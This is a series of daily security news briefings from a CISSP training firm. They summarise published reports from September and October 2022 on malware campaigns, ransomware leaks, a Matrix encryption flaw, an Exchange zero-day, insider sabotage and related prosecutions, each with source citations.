Les Bell and Associates Pty Ltd

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

More Fake Job Malmails Trigger 0day Malware

Researchers at ESET have uncovered a new set of malware tools being deployed by North Korean APT, Lazarus group (a.k.a. HIDDEN COBRA - the group behind the Sony Pictures Entertainment breach and WannaCry). Most notable among these is the first observed exploit of CVE-2021-21551 in Dell DBUtil drivers in order to disable all security products on compromised machines. The exploit uses techniques against the Windows kernel instrumentation API's that have never been seen before, in order to block the monitoring of low-level actions like process instantiation, event tracing, etc.

The delivery mechanism is the increasingly common one of fake job offers - in one case via LinkedIn messaging, in another via email. Opening the attached document triggers a chain of droppers, loaders, backdoors, uploaders and downloaders - in all cases, trojanized open-source projects which decrypt the embedded payload using block ciphers with long keys passed as command-line arguments.

Kálnai, Peter, Amazon-themed campaigns of Lazarus in the Netherlands, ESET We Live Security blog, 30 September 2022. Available online at https://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/.

Fake CISO Profiles on LinkedIn - Related?

In a possibly related story, blogger Brian Krebs has noted the creation of a large number of fake LinkedIn profiles for people occupying CISO positions at Fortune 500 companies. Krebs gives the example of a so-called 'Victor Sites' who claims to be CISO at Chevron; the real CISO is Christopher Lukas. However, a Google search for the CISO of Chevron returns Sites as the first result.

Compounding the problem, a number of magazine journalists and bloggers are accepting the fake profiles as truth and republishing their information. LinkedIn is working on taking the fake profiles down, but seems to need a more robust process for validating claimed positions.

However, with the current burst of malmails and phishes making use of phone job offers at major companies, including via LinkedIn messaging, one can't help wondering . . .

Krebs, Brian, Fake CISO Profiles on LinkedIn Target Fortune 500s, blog post, 29 September 2022. Available online at https://krebsonsecurity.com/2022/09/fake-ciso-profiles-on-linkedin-target-fortune-500s/.

Ransomware Demands - Damned If You Do, Damned If You Don't

Enterprises who fall foul of ransomware attacks are often faced with a bleak choice: pay the ransom demand to recover, or refuse. Refusal might require significant cleanup, data recovery from backups and the possible loss of some data, but the alternative contributes funding to increasingly well-resourced gangs who can now afford to hire developers, buy 0day exploits and still live high on the hog - thereby making the problem worse and weaking our overall position.

The decision wasn't too hard in the early days, but the stakes have been raised with the ubiquitous use of ransomware that also exfiltrates the data as it encrypts. Not paying the ransom now risks the exposure of possibly sensitive personal data and significant damage to lives, not just a financial hit. Governments have raised the possibility of making ransomware payments illegal, but cavill at the possibility of being blamed by an enterprise and its customers and patients that were legally blocked from forestalling a disastrous public exposure.

In the latest example, the Vice Society ransomware gang has published data which they had exfiltrated from the Los Angeles Unified School District, which had refused to pay an extortion demand, remaining "firm that dollars must be used to fund students and education" and pointing out that payment will not guarantee full recovery. 

The 500 GB of data includes contact and legal documents, financial reports including bank account details, health information including COVID-19 test data, previous conviction reports and psychological assessments of students, according to TechCrunch.

Haber, Shannon, Los Angeles Unified Response on Cyberattack, press release, 30 September 2022. Available online at https://achieve.lausd.net/site/default.aspx?PageType=3&DomainID=4&ModuleInstanceID=4466&ViewID=6446EE88-D30C-497E-9316-3F8874B3E108&RenderLoc=0&FlexDataID=123107&PageID=1.

Carvalho, Alberto M., Thank you to our students, families and employees . . ., tweet, 3 October 2022. Available online at https://twitter.com/LAUSDSup/status/1576636549994717184.

Page, Carly, Hackers leak 500GB trove of data stolen during LAUSD ransomware attack, TechCrunch+, 3 October 2022. Available online at https://techcrunch.com/2022/10/03/los-angeles-school-district-ransomware-data/.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

New Malware Achieves Persistence in VMware ESXi Hypervisors

Mandiant has discovered a new family of malware which targets VMware ESXi hypervisors, Linux vCenter servers and Windows VM's. The malware allows a threat actor to:

• maintain persistent access to the hypervisor
• send command to the hypervisor which will then be routed to the guest VM for execution
• transfer files between the hypervisor and guest machines
• tamper with logs on the hypervisor
• execute arbitrary command from one guest to another guest on the same hypervisor.

It is important to note that this is a post-exploitation tookit; the attacker has to use some other - as yet undetermined - exploit to gain admin access to the ESXi hypervisor. But once this has been done, they are likely to escape detection for a long time, due to the lower level of support for endpoint dection and response products on hypervisors.

In their reports, Mandiant identified two new malware families, VIRTUALPITA and VIRTUALPIE, which are installed as malicious vSphere Installation Bundles (VIB's), despite not being signed by VMware or any of its trusted partners. Another component, VIRTUALGATE, is installed on Windows VM's to enable communication via VMware's virtual machine communication interface (VMCI).

The compaign is highly targeted and evasive, and while definitive attribution is not yet possible, the motive is probably cyber-espionage, and the threat actor possibly of Chinese origin.

Marvi, Alexander, Jeremy Koppen, Tufail Ahmed and Jonathan Lepore, Bad VI(E)s Part One: Investigating Novel Malware Persistence Within ESXi Hypervisors, Mandiant blog, 29 September 2022. Available online at https://www.mandiant.com/resources/blog/esxi-hypervisors-malware-persistence.

Marvi, Alexander and Greg Blaum, Bad VIB(E)s Part Two: Detection and Hardening within ESXi Hypervisors, Maniant blog, 29 September 2022. Available online at https://www.mandiant.com/resources/blog/esxi-hypervisors-detection-hardening.

Threat Actor Dangles US, NZ Jobs to Deliver Cobalt Strike Beacons

Cisco Talos researchers have uncovered a threat actor sending malmails which lure recipients into opening an infected MS Word document with details of a job with either the US government or a trade union in New Zealand. If the recipient falls for the lure, attempts to exploit CVE-2017-0199, a remote code execution vulnerability, by downloading a malicious Word document template from a BitBucket repository controlled by the attacker.

The downloaded .dotm template then executes an embedded VBA script - one variant of this deobfuscates and executes multiple Visual Basic and PowerShell scripts while another downloads and runs an executable that runs malicious PowerShell commands. Ultimately it downloads and runs a leaked version of a Cobalt Strike beacon which is cnfigured to inject arbitrary binaries, although the Redline infostealer and Maday botnet have also been seen as payloads.

Rghuprasad, Chetan and Vanja Svajcer, New campaign uses government, union-themed lures to deliver Cobalt Strike beacons, Talos Intelligence blog, 28 September 2022. Available online at https://blog.talosintelligence.com/2022/09/new-campaign-uses-government-union.html.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

Sophisticated Exploit PoC Breaks End-to-End Encryption in Matrix

Matrix is an open standard and suite of protocols which aim to make real-time communications, such as teleconferencing, operate as transparently as email. A user with an account on any Matrix server - called their homeserver - can use these protocols to communicate across the entire Matrix ecosystem. Since this will utilize untrusted servers, the specification enables end-to-end encryption by default, using the Olm and Megolm cryptographic ratchets, which are intended to provide perfect forward security.

Now, researchers at Royal Holloway University, University of Sheffield and Brave Software have published a paper revealing some subtle vulnerabilities in the implementations of these protocols in the matrix-react-sdk and matrix-js-sdk reference development libraries for these protocols. These lead to two critical severity vulnerabilities.

In the first attack, a malicious homeserver can add users which they control to end-to-end encrypted rooms, by spoofing room membership messages, which are not authenticated in these protocols. Once they have been added, these users can decrypt future messages sent in that room.. In the second attack, the malicious homeserver adds a device, which they control, to another user's account in the room. While the device will be labeled 'unverified', with a warning icon, to all users in the room, the damage is done - existing devices will have shared their session data with the new device, allowing decryption of all future messages.

The Matrix project has released patches for the affected libraries (which not all Matrix implementation use) and users are advised to upgrade.

Albrecht, Martin R, Sofía Celi, Benjamin Dowling, and Daniel Jones, Practically-Exploitable Cryptographic Vulnerabilities in Matrix, preprint, undated. Available online at https://nebuchadnezzar-megolm.github.io/.

Hodgson, Matthew, et. al., Upgrade now to address E2EE vulnerabilities in matrix-js-sdk, matrix-ios-sdk and matrix-android-sdk2, blog post, 28 September 2022. Available online at https://matrix.org/blog/2022/09/28/upgrade-now-to-address-encryption-vulns-in-matrix-sdks-and-clients.

Admin Pleads Guilty to Sabotaging Former Employer

An admin who had worked for a major Hawaii-based finance sector company has pleaded guilty to sabotaging his former employer's network. Casey K. Umetsu worked for the firm between 2017 and 2019 as a network administrator, but shortly after leaving their employ, he used his credentials to access an admin dashboard and made numerous changes, including redirecting web and email traffic to external machines - effectively a denial of service. He also locked other administrators out of the dashboard so that they could not resolve the problem for several days.

His plan was to convince the company to hire him back at a higher salary - but the company contacted the FBI, who tracked him down, and he now faces a maximum sentence of 10 years in prison and a fine of up to $US250,000, which counts as a spectacular CLM (Career Limiting Move).

Of course, there's a lesson here for all of us, although the former employer paid a high price for it: have a procedure to rapidly revoke the access of highly-privileged employees (admittedly easier to say than to do).

Enoki, Elliot, Honolulu Man Pleads Guilty to Sabotaging Former Employer’s Computer Network, DOJ Us Attorney's Office, District of Hawaii, 28 September 2022. Available online at https://www.justice.gov/usao-hi/pr/honolulu-man-pleads-guilty-sabotaging-former-employer-s-computer-network.

Microsoft Eyes North Korean Hackers Weaponizing Open Source

Over the last few months, Microsoft's Threat Intelligence Center has been tracking an actor they label ZINC (also known as Labyrinth Chollima and BlackArtemis) using social engineering attacks against employees in media, defence, aerospace and IT in the US, UK, India and Russia. The attacker starts with LinkedIn connections as a way to build trust with victims, then switched to communication via WhatsApp, which they used to deliver their payloads with the lure of employment.

The payloads are weaponized versions of popular open-source programs including PuTTY, KiTTY, TightVNC. Sumatra PDF Reader and others, and the embedded payload is an obfuscated variant of the ZetaNile malware. This relates to a similar campaign reported by Mandiant earlier this month.

ZINC's goals are cyberespionage and theft of corporate data, but this attacker will also settle for personal data, financial gain and network disruption.

MSTIC and LinkedIn Threat Prevention and Defense, ZINC weaponizing open-source software, blog post, 29 September 2022. Available online at https://www.microsoft.com/security/blog/2022/09/29/zinc-weaponizing-open-source-software/.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

Multi-Platform, Multi-Function Malware

Black Lotus Labs has released their analysis of a new malware sample christened 'Chaos' by its developers, who seem to be Chinese. Chaos is written in the Go programming language, and has been designed to operate on both Windows and Linux systems on multiple different architectures, including Intel/AMD, ARM and PowerPC.

Once Chaos is installed on a device, it becomes persistent and then creates a UDP port from which it establishes initial contact with a C2 server, sending the OS version and platfrom. On Windows, it will create a registry key and copy itself into another directory. It follows this by establishing a TLS connection with the C2 server and collecting additional information about the system it has infected.

From here, it will receive staging commands, which will use another port to download additional files which it will go on to use in obtaining SSH connections to new hosts, whether using keys it found on the infected host, by brute forcing, or by using keys it downloads. It may also download a file containing passwords likely to succeed.

If it manages to break into another system, it contacts yet another C2 server which carries copies of Chaos compiled for all useful combinations of OS and platform.

Infected systems will also receive any of 70 additional commands which might further exploit the current system, open a reverse shell, run scripts to exploit known CVE vulnerabilities on other machines, launch DDoS attacks or start cryptomining using the xmrig Monero miner.

Black Lotus Labs, Chaos Is A Go-based Swiss Army Knife of Malware, Lumen blog, 28 September 2022. Available online at https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/.

Brute Ratel Red-Team Toolkit Cracked, Shared By Threat Actors

In red-team penetration testing, the whole idea is for the red team to document their exploits as they twist and pivot inside the defenders' network, so that they can share this information with the blue team in order to improve their defensive controls and their incident response procedures and playbooks. A popular framework for this purpose is Brute Ratel, a post-exploitation toolkit that works by installing agents called badgers on network devices and using them to run attacks while evading IDS, EDR and AV products. As it does this, it records its progress, generating a timeline and graph of each attack for use in subsequent analysis.

So far, so good. But now, a threat actor has cracked the licence protection in Brute Ratel, so that it can be installed and run without an activation key, and as word spreads in underground forums, it is likely that cybercrime groups have gained access to the tool - or very soon will. The problem with this is that one of Brute Ratel's key strengths is its ability to generate novel shellcode which cannot be detected by existing EDR and AV products the shellcode is a unique IOC each time.

Brute Ratel now joins Cobalt Strike as a defensive weapon that has fallen into the wrong hands.

BushidoToken, Brute Ratel cracked and shared across the Cybercriminal Underground, blog post, 28 September 2022. Available online at https://blog.bushidotoken.net/2022/09/brute-ratel-cracked-and-shared-across.html.

Microsoft Exchange RCE 0day Active in the Wild

Vietnames security firm GTSC is warning of an extensive campaign which targets Microsoft Exchange servers via two previously-undiscovered vulnerabilities. GTSC notified Microsoft via submission to the Zero Day Initiative, but the Redmond company is yet to acknowledge them and they do not have CVE numbers. However, GTSC calculates their CVSS scores to be 8.8 and 6.3, since their exploitation leads to remote command execution.

The attack was revealed when GTSC observed IIS log entries which looked similar to those of the ProxyShell vulnerability, and with a little analysis, their red team figured out how to access the Exchange back end and perform RCE.

Tracing through the logs, they also found that the exploit was followed by information collection, the installation of Chinese Chopper web shells, which seem to be managed by Antsword, a Chinese-based open-source website admin tool that supports web shell management.

Although they do not wish to release technical details, GTSC have provided a temporary mitigation which uses a URL rewrite rule.

GTSC Team, Warning: New Attack Campaign Utilized a New 0-Day RCE Vulnerability on Microsoft Exchange Server, blog post, 28 September 2022. Available online at https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html.

Former eBay Execs Get Jail Time for Harrassment

Two former security executives at eBay Inc have been sentenced to prison for their part in a campaign of harrassment and intimidation directed at a MA couple whose eCommerce newsletter had annoyed then-CEO Devin Wenig.

Jim Baugh, former senior director of safety and security, and David Harville, former director of global resiliency received sentences of 57 months and 24 months respectively, along with fines of $US40,000 and $US20,000, after pleading guilty to cyberstalking-related charges.

The campaign began after Wenig, annoyed by comments critical of eBay in the newsletter of David and Ina Steiner, texted another executive that it was time to "take her down". In the campaign that followed the couple were subjected to anonymous harrassing tweets, bizarre emails and creepy package deliveries like spiders, cockroaches, a funeral wreath, a bloody Halloween pig mask and a book on how to survive the death of a spouse.

Seven eBay employees were charged in connection with the campaign, although Wenig was not, having "absolutely zero knowledge" of the actions that followed. A civil suit by the Steiners remains pending.

Raymond, Nate, Ex-eBay execs heading to prison for harrassing couple behind newsletter, Reuters, 30 September 2022. Available online at https://www.reuters.com/world/us/ex-ebay-exec-heading-prison-harassing-couple-behind-newsletter-2022-09-29/.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

New Campaign Targets US Defence Contractors

Security researchers at Securonix have uncovered a sophisticated attack campaign directed at multiple military and weapons contractors, including a likely supplier to the F-35 Lightning II fighter program. The initial compromise is achieved by a spear-phishing malmail which carries an attached shortcut file with a seductive name like 'Company & Benefits.pdf.lnk". This then uses the forfiles command to stealthily run a PowerShell command line script which repeatedly attempts to connect to a C2 server in order to fetch the next of seven stages of downloaded scripts which complete the infection.

The multiple-stage infection process exmploys many aggressive antiforensics techniques; for example, if it detects it is being executed in a virtualization sandbox, it disables networking on the system, deletes all the user files it can find, and then shuts the machine down. Of particular interest is that if the system language is Chinese or Russian, then it simply exits after initiating a shutdown.

Along the way, the different stages contact a variety of C2 servers which are themselves hidden behind a Cloudflare front end which will also provide CDN services and TLS encryption. The Securonix blog article provides a comprehensive analysis including IOC's and threat hunting queries.

Iuzvyk, D., T. Peck and O. Kolesnikov, Securonix Threat Labs Security Advisory: Detecting STEEP#MAVERICK: New Covert Attack Campaign Targeting Military Contractors, blog post, September 2022. Available online at https://www.securonix.com/blog/detecting-steepmaverick-new-covert-attack-campaign-targeting-military-contractors/.

Auth0 Code Compromised, Somehow

Authentication service provider Auth0, now a subsidiary of Okta, has disclosed that a third party has somehow acquired a copy of some Auth0 code respositories, dated October 2020. However, an extensive investigation conducted by both the company itself and a DFIR consultancy found no evidence of unauthorized access to its environments, and no evidence of any data exfiltration.

Although the mechanism of the breach remains a mystery, the company has notified law enforcement and taken additionl steps to ensure the code cannot be used to compromise any accounts.

Uncredited, Auth0 Code Repository Archives From 2020 and Earlier, blog post, 26 September 2022. Available online at https://auth0.com/blog/auth0-code-repository-archives-from-2020-and-earlier/.

Facebook Shutters Chinese, Russian Disinformation Networks

Facebook parent company Meta has disclosed actions it has taken to shut down two unconnected networks - one Chinese, one Russian - which were violating the firm's policy against what it terms 'coordinated inauthentic behaviour'.

The Chinese-origin operation targeted primarily the US and Czechia (the Czech Republic), posting on Facebook, Instagram, Twitter and two petition platforms in Czechia. Its focus was to influence US voters of all political stripes ahead of the upcoming midterm elections, and also to influence Czechia's foreitn policy towards China and Ukraine.

The Russian network focused on Germany, France, Italy, Ukraine and the UK with narratives on the Ukraine conflict and its impact in Europe. This was a large and complex campaign which used sock puppet accounts on Facebook, Instagram, LiveJournal, YouTube, Telegram, Twitter, Change.org and Avaaz to direct readers to a network of over 60 web sites impersonating legitimate news organizations such as The Guardian and Der Spiegel.

The full, 30-page report includes IOC's; for social media users the obvious lesson is to check the URL bar on links you follow from posts, to make sure you are looking at the real news site.

Nimmo, Ben and David Agranovich, Removing Coordinated Inauthentic Behavior From China and Russia, news release, Meta, 27 September 2022. Available online at https://about.fb.com/news/2022/09/removing-coordinated-inauthentic-behavior-from-china-and-russia/.

Nimmo, Ben and Mike Torrey, Taking down coordinated inauthentic behavior from Russia and China, Detailed Report, September 2022. Available online from https://about.fb.com/wp-content/uploads/2022/09/CIB-Report_-China-Russia_Sept-2022-1-1.pdf.

"Quantum Builder" Shortcuts Used to Deliver RATs

A new campaign is using a tool called "Quantum Builder" to generate malicious Windows shortcut and similar files in order to deliver the Agent Tesla keylogger RAT to victims.

Quantum Builder, which is linked to the Lazarus Group APT, can generate mailicious .lnk, .hta and PowerShell payloads which use multiple stages to deliver Agent Tesla. The payloads use a variety of sophisticated techniques:

• User Account Control bypass
• Multi-stage infection chain making use of LOLBins
• In-memory execution of PowerShell scripts
• Execution of decoys to distract victims post-compromise

ZScaler ThreatLabz, who discovered the campaign, say they are unable to confidently make attribution at this stage, but have provided a full analysis in their report.

Zscaler ThreatLabz, Agent Tesla RAT Delivered by Quantum Builder With New TTPs, blog post, 27 September 2022. Available online at https://www.zscaler.com/blogs/security-research/agent-tesla-rat-delivered-quantum-builder-new-ttps.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

Powerful Infostealer for Rent

Since late July, a Russian-speaking malware developer has been offering an extremely sophisticated info stealer, called Erbium, on a dark web forum. The author claims that it is the best on the market, having taken several months to develop, and this is perhaps reflected in the fact that the asking price for one year of the service has gone from $150 to $1,000, including technical support and updates (considerably less than any comparable infostealer).

Erbium has a vast range of capabilities, from system info enumeration to the ability to collect user credentials from web browsers, chat and email programs. It can also capture cryptocurrency wallet information (including login credentials and stored funds) and can collect multi-factor authentication information as well as the content of password safe programs.

The malware uses extensive antiforensic techniques to evade detection, being polymorphic and also using XOR encryption to obfuscate the ErbiumStealer.dll second stage, which it downloads from a C2 server. Its control panel communicates over a Telegram channel. Erbium has now been observed and analyzed by both Cluster25 and Cyfirma.

Cluster25 Threat Intel Team, Erbium InfoStealer Enters the Scene: Characteristics and Origins, blog post, 15 September 2022. Available online at https://blog.cluster25.duskrise.com/2022/09/15/erbium-stealer-a-new-infostealer.

Uncredited, Erbium Stealer Malware Report, technical report, 25 September 2022. Available online at https://www.cyfirma.com/outofband/erbium-stealer-malware-report/.

Europol Hackathon Targets Human Trafficking Networks

A hackathon hosted by the Dutch Police Academy in Apeldoorn on behalf of Europol on 6 September brought together 85 experts from 20 countries to focus on combating criminal networks that use social media, the public web and the dark web to conduct human trafficking for sexual or labour exploitation. It is relatively easy to identify trafficking of drugs or weapons online, but the indicators of online activity in human trafficking are more subtle and challenging, so the investigators gathered criminal intelligence to determine these indicators and, in particular, to target human traffickers attempting to lure Ukrainian refugees.

The traffickers will attempt to hijack social media platforms, online dating apps, advertising and aid platforms, messaging apps, forums and private groups in order to lure their victims while evading detection by law enforcement. The hackathon was a success:

• 114 online platforms monitored in total, of which 30 were related to vulnerable Ukrainian refugees;
• 53 online platforms suspected of links to human trafficking checked, of which 10 were related to vulnerable Ukrainian refugees;
• Five online platforms linked to human trafficking checked, of which four were related to child sexual exploitation on the dark web;
• 11 suspected human traffickers identified, 5 of whom were linked to trafficking of human beings, and specifically to vulnerable Ukrainian citizens;
• 45 possible victims identified, 25 of whom were of Ukrainian nationality;
• 20 platforms with possible links to trafficking of human beings identified for further investigation and monitoring;
• 80 persons/user names checked, out of which 30 were related to possible exploitation of vulnerable Ukrainian citizens.

This is a useful reminder that our work in the online world often has deeper consequences for victims in the real world.

Belanger, Ashley, Hackathon finds dozens of Ukrainian refugees trafficked online, Ars Technical, 23 September 2022. Available online at https://arstechnica.com/tech-policy/2022/09/hackathon-finds-dozens-of-ukrainian-refugees-trafficked-online/.

Damned If You Do, Damned If You Don't

Illustrating the particularly nasty nature of ransomware extortions, the hackers who compromised systems at the Centre Hospitalier Sud Francilien hospital in Corbeil-Essonne near Paris have now responded to the authorities' refusal to pay a ransom demand by leaking patient information online.

The hospital was hit one weekend in August, with all their major systems disabled by LockBit ransomware, requiring patients to be sent elsewhere and major surgeries to be postponed. The attackers demanded payment of $US10 million to unlock the data, and threatened to release all the information they had exfiltrated - which they have now done.

The data includes the French equivalent to social security numbers as well as examination reports, test results and more, and could impact patients but also doctors, staff and employees of partners such as laboratories.

Stahie, Silviu, Hackers Release Stolen Data after French Hospital Refuses to Pay Decryption Ransom, Bitdefender HotForSecurity blog, 27 September 2022. Available online at https://www.bitdefender.com/blog/hotforsecurity/hackers-release-stolen-data-after-french-hospital-refuses-to-pay-decryption-ransom/.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

CI/CD Pipelines Exposed Via Source Code Repository Webhooks

A fascinating PoC developed by Cider Security shows how DevOps software deployment pipelines can be compromised by webhooks they expose so that cloud SaaS source code management systems can trigger internal build events.

Enterprises often establish internal built/test/deploy pipelines using automation servers like Jenkins (https://www.jenkins.io/), but make use of cloud-hosted source code repositories like GitHub and GitLab. In order to automatically push commits from the source repository to the deployment pipeline, these systems support webhooks which trigger actions on the automation server by POSTing a request to a RESTful API. But for this to work, the enterprise firewalls must accept inbound HTTP requests from a particular range of IP addresses owned by the repository.

A complicating factor is that automation servers are often seen as well-protected since they are well inside the firewall, but they also have a large number of poorly-maintained plugins and can remain unpatched for long periods. If an attacker can a) find an automation server exposed endpoint and b) get the source repository to send cunningly-crafted payloads, then they have opened a door to brute-force credentials, then execute Jenkins commands. All kinds of interesting possibilities then follow: compromising code deployed to production systems, pivoting to attack other systems or even arbitrary remote command execution.

It's not easy - but Cider have shown that - and how - it can be done. Time to take a closer look at those CI/CD pipelines.

Gil, Omer and Asi Greenholts, How we Abused Repository Webhooks to Access Internal CI Systems at Scale, blog post, 20 September 2022. Available online at https://www.cidersecurity.io/blog/research/how-we-abused-repository-webhooks-to-access-internal-ci-systems-at-scale/.

Morgan Stanley Insecure Asset Disposal Attracts $23 Million Fine

Financial services company Morgan Stanley has been fined $US35 million by the Securities and Exchange Commission for "extensive failures to protect the personal identifying information of approximately 15 million customers". The company agreed to the payment in order to escape a court process which might have had a worse outcome.

In point of fact,, Morgan Stanley didn't actually dispose of the old hard drives and network caching devices itself - it had contracted another company to take care of the tasks. But the company failed to promulgate adequate policies for equipment retirement and data destruction, did not manage the selection of a contractor to perform the task, and had inadequate procedures for assuring secure destruction by the contractor.

Full details are in the administrative proceeding file, linked below, which makes fascinating - and essential - reading.

The lessons are clear:

• You can outsource or delegate responsibility for some security-related functions, but you can't escape accountability and liability
• Device retirement policies should require secure destruction, rather than over-writing and reselling, for media that contains sensitive data, especially PII
• Full-device encryption can aid with compliance, as long as keys are correctly managed
• PII that escapes can show up years later, with expensive consequences

Uncredited, Morgan Stanley Smith Barney to Pay $35 Million for Extensive Failures to Safeguard Personal Information of Millions of Customers, press release, 20 September 2022. Available online at https://www.sec.gov/news/press-release/2022-168.

United States of America v. Morgan Stanley Smith Barney LLC (respondent), Administrative Proceeding File No. 3-21112, 20 September 2022. Available online at https://www.sec.gov/litigation/admin/2022/34-95832.pdf.

Rusian Groups Ramp Up Attacks

As the Russia/Ukraine conflict seems likely to enter a new phase, Ukrainian Defence Intelligence has warned that Russia is preparing massive cyberattacks on critical infrastructure facilities of Ukraine and its allies. Western countries are likely to be collateral damage, if not direct targets, in these campaigns.

Mandiant is tracking multiple self-proclaimed hacktivist groups working for Russia, primarily conducting DDoS attacks and leaking stolen data. Such groups, although claiming independence, seem to be working closely with, or are simply a front for, the Russian state.

The moderators of three Telegram channels - "XaKNet Team", "Infoccentr" and "CyberArmyofRussia_Reborn" - are using GRU-sponsored APT28 (Fancy Bear) tools on Ukrainian victims' networks, leaking their data within 28 hours of wiping activity by APT28.

Meanwhile, Cluster25 researchers have analyzed an infected PowerPoint file which an APT28-affialiated group is using to implant a variant of Graphite malware. The technique exploits a code execution technique which is triggered when the user enters presentation mode and then moves the mouse - this then runs a PowerShell script which downloads and executes a dropper from OneDrive, which in turn downloads and injects the Graphite variant.

Cluster25 Threat Intel Team, In the footsteps of the Fancy Bear: PowerPoint mouse-over event abused to deliver Graphite implants, blog post, 23 September 2022. Available online at https://blog.cluster25.duskrise.com/2022/09/23/in-the-footsteps-of-the-fancy-bear-powerpoint-graphite/.

Defence Intelligence of Ukraine, !! The occupiers are preparing massive cyberattacks ..., tweet 26 September 2022. Available online at https://twitter.com/DI_Ukraine/status/1574324482277363714.

Mandiant Intelligence, GRU: Rise of the (Telegram) MinIOns, blog post, 23 September 2022. Available online at https://www.mandiant.com/resources/blog/gru-rise-telegram-minions.

Russian Botmaster Requests Extradition to the US

The likely operator of the RSOCKS botnet, 36-year-old Russian national Denis Emelyantsev, a.k.a.Denis Kloster, has been arrested in Bulgaria at the request of US authorities, reports Brian Krebs. In a novel twist, he requested, and was granted, extradition to the US, apparently telling the judge, "America is looking for me because I have enormous information and they need it".

A cynical observer might observe that whether or not he has "enormous information", Russian President Vladimir Putin has instituted a massive conscription program, and this might have factored in his decision.

Krebs, Brian, Accused Russian RSOCKS Botmaster Arrested, Requests Extradition to U.S., blog post, 23 September 2022. Available online at https://krebsonsecurity.com/2022/09/accused-russian-rsocks-botmaster-arrested-requests-extradition-to-u-s/.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

Uber & Rockstar GTA Hacker Arrested

The City of London Police has revealed that it has arrest a 17-year-old teenager from Oxfordshire on suspicion of hacking. It is believed that the real-world identity hacker, who went by the handles 'teapot' and 'teapotuberhacker', was outed in an online forum, giving the police the information they needed to act.

If this is correct, the teenager also hacked Microsoft, Rockstar Games and Uber and may well be 'White' or 'Breachbase', the ringleader of the Lapsus$ extortion group. This group has mainly employed social engineering attacks on employee accounts for initial access, but then employs increasingly sophisticated technical techniques for lateral movement. They have also attempted to recruit privileged insiders at telcos, tech companies and callcenters, bribing them to provide VPN or Citrix credentials.

City of London Police, On the evening of Thursday 22 September ..., tweet, 23 September 2022. Available online at https://twitter.com/CityPolice/status/1573281533665972225.

